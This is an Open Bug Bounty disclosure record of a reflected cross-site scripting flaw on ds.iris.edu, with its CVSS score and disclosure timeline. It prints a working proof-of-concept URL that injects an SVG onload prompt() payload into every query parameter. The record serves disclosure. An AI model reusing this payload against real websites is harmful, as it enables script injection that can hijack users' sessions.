ds.iris.edu XSS vulnerability

2017-12-03T03:36:00
ID OBB:447164
Type openbugbounty
Reporter ut
Modified 2018-03-03T03:36:00

Description

Open Bug Bounty ID: OBB-447164

Description| Value
---|---
Affected Website:| ds.iris.edu
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://ds.iris.edu/ieb/index.html?format=text%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&nodata;=404%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&starttime;=1970-01-01%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&endtime;=2025-01-01%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&minmag;=0%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxmag;=10%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&mindepth;=0%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxdepth;=900%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&orderby;=time-desc%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&limit;=200%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxlat;=52.150%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&minlat;=50.150%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxlon;=-179.410%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&minlon;=178.590%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&sbl;=1%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&pbl;=1%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&audience;=epo%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&caller;=spanevlnk%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&evid;=5173864%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&name;=ISLAS%20RATA,%20ALEUTIANAS%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&zm;=7%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&mt;=ter%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 3 December, 2017 03:36 GMT
Vulnerability Verified:| 3 December, 2017 03:38 GMT
Website Operator Notified:| 3 December, 2017 03:38 GMT
Vulnerability Published:| 3 December, 2017 03:38 GMT[without any technical details]
Public Disclosure:| 3 March, 2018 03:36 GMT